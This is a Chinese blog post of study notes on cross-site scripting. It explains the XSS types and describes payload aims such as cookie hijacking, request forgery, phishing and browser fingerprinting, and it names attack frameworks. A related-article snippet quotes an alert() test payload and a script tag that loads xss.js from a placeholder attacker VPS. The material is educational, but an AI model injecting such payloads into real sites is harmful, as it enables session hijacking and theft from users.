XSS知识点归纳

最新推荐文章于 2024-07-15 17:53:55 发布
最新推荐文章于 2024-07-15 17:53:55 发布
阅读量231 收藏
点赞数
分类专栏: XSS 文章标签: XSS web security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43175046/article/details/82596646
版权

XSS知识点归纳

XSS攻击指通过HTML注入篡改网页,插入恶意的脚本,当用户浏览网页的时候,控制浏览器。

XSS的三种类型

  • 反射型XSS
    诱使用户点击一个恶意链接,才能攻击成功,即将用户输入的数据返回给浏览器
    反射型XSS也叫做“非持久型XSS”

  • 存储型XSS
    将用户输入的数据存储到服务器端,这种XSS有很强的稳定性,所以也叫做持久型XSS。比如我在这篇博客里植入了恶意代码,访问到这个博客的所有人的浏览器都会执行这段恶意代码。

  • DOM Based XSS
    通过修改页面的DOM节点形成的XSS

XSS Payload

XSS攻击成功后,攻击者能够对用户当前的浏览页面植入恶意脚本,通过恶意脚本,控制用户的浏览器,这些完成各种具体功能的恶意脚本,成为XSS Payload
实质上就是JS脚本,任何JS脚本能实现的功能,XSS也能实现

  • Cookie劫持
    常见的XSS Payload,就是通过读取流啊冷凝器的Cookie对象,从而发起Cookie劫持攻击
    Cookie一般加密保存了当前用户的登录凭证,如果丢失,代表着用户的登录凭证丢失

  • 构造GET和POST请求
    一个网站的应用只需要接受HTTP协议中的GET或者POST请求就可以完成所有操作,对于攻击者来说,仅通过JS就可以让浏览器发起这两种请求

  • XSS钓鱼
    通过与用户交互,实现钓鱼操作,但需要绕过验证码

  • 识别用户浏览器
    通过XSS读取浏览器的UserAgent对象,这个对象会告诉很多客户端的信息,但是这个对象可以是伪造的,信息不一定准确。不同的浏览器之间有区别,不同的版本也有区别,可以通过这些区别来判断浏览器的信息。

  • 识别用户安装的软件
    通过判断用户安装的软件,选择对应的浏览器漏洞,最终植入木马。在IE中,可以判断ActiveX控件的classid是否存在,来推测用户是否安装了该软件(即搜集常用软件的classid)

XSS攻击平台

Attack API
BeFF
XSS-Proxy等等

调试JS

Firebug
IE 8 Developer Tools
Fiddler
HttpWatch

以上内容为初步整理,后续会更新 解析XSS练习题 总结XSS的构造 总结XSS的防御
不断学习,不断变强。

Neiko_0day
关注
专栏目录
xss相关知识点
weixin_55021949的博客
07-30 375
xss
xss基础知识点
weixin_52776876的博客
07-27 2234
​跨站脚本攻击,英文全称CrossSiteScript.​xss攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本.从而在用户浏览网页,控制用户浏览器的一种攻击.
XSS注入知识点总结.pdf
02-07
该文档是在看网络学习视频总结,从XSS漏洞概述,XSS分类,XSS构造,XSS变形,XSS的利用,XSS的防御进行总结,分章节进行叙述,可作为学习文档。
XSS知识点总结
Jerry____的博客
07-08 469
浏览器遵守同源策略 javaScript同源对比:协议、域名、端口三者完全相同即是同源。 HTML中不受同源策略限制的标签: <script src = http://xss.tv/jquery.js> <img src = http://xss.tv/back.jpg> <iframe src = > <link src = > XSS 跨站脚本...
xss复习总结及ctfshow做题总结xss
最新发布
m0_74402888的博客
07-15 785
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。存储XSS:<持久化> 代码是存储在服务器数据库中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOMXSS,但是也还是包括在存储XSS内)。
XSS小结
wkend的博客
10-19 1580
XSS是什么? XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射攻击,攻击者在可信的网页中嵌入恶意代码,用户访问可信网页触发XSS而被攻击。 XSS会造成那些危害? 攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用...
xss知识点总结
weixin_45498459的博客
03-17 292
<script> alert(弹窗的值);</script> <script src="http://<yourVPS>/xss.js"></script>asd 在php中单引号中的变量是不被解析的,双引号中的变量和数组及常量是可以被解析的。 on事件大全 onactivate 当对象设置为活动元素触发。 onafterprint 对象所关联的文档打印或打印预览后立即在对象上触发。 onbeforeactivate 对象要被设置..
XSS知识点
禅心之道的博客
05-22 288
一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行XSS发生了。 这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。 二、XSS有什么危害? 当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防...
CSRF与XSS攻防知识点总结
小青蛙的博客
12-16 552
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
【干货】XSS知识总结
hackzkaq的博客
10-27 6699
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
Java安全知识点总结
04-20
Java安全知识点涵盖了一系列与Java编程和应用程序开发相关的安全概念、实践和技术。以下是一些常见的Java安全知识点输入验证:在Java应用程序中,输入验证是非常重要的安全措施,以防止用户提供恶意或恶意格式化...
XSS知识总结
qq_43842093的博客
11-07 6807
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
XSS相关知识点
weixin_50931715的博客
08-03 1184
它是基于DoM文档对象模的一种漏洞,并且DOMXSS是基于JS上的,并不需要与服务器进行交互。不同于反射XSS和存储XSS,基于DOM的XSS跨站脚本攻击往往需要针对具体的 Javascript DOM代码进行分析,并根据实际情况进行XSS跨站脚本攻击的利用。形成XSS漏洞的主要原因是程序对输入和输出的控制过滤不够完善、严格,导致“精心构造”的脚本输入后,在输到前端浏览器当作有效代码解析执行从而产生危害。在危害性上:存储XSS > DOM-XSS > 反射XSS。二、XSS产生的原因。...
XSS知识汇总
公众号shadow sock7
06-19 796
xss如何加载远程js的一些tips』 http://www.freebuf.com/articles/web/24496.html 『打造一个自动检测页面是否存在XSS的插件(完结篇)』 http://www.freebuf.com/sectool/82743.html 『说一说新手在寻找XSS所存在的一些误区』 http://www.freebuf.com/articles/web
xss有关知识
Marsper的博客
10-19 224
xss简介 xss - 跨站脚本攻击 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页之,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞的验证 用一段简单的代码验证和检测漏洞的存在,这样的代码叫做POC(proof of concept) POC
XSS总结
mingyqf的博客
04-09 864
转至:https://xz.aliyun.com/t/4067 By七友 / 2019-02-16 09:42:00 / 浏览数 38056 安全技术 WEB安全[顶(6)](javascript:) [踩(1)](javascript:) 简述 XSS攻击通常指的是通过利用网页开发留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的
XSS基础知识
AmyBaby00的博客
09-29 727
XSS原理 XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识 XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。 它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。 在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制。 XSS攻击的主要目的则是,想办法获取
OWASP TOP 10
weixin_45515936的博客
04-01 336
OWASP TOP 10 13年版已升级-2017版本 参考: https://blog.csdn.net/wang_624/article/details/89683571?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522159198134219725211934408%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=15919813
"PHP网络开发必备知识点总结:函数一览,魔术方法详解
本文将对这些知识点进行总结,并列出一些常用的函数和必备的魔术方法。 一、魔术方法 在PHP中,魔术方法是一些特殊的方法,它们具有特定的功能和调用方式。常用的魔术方法包括: 1. __construct():当实例化一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值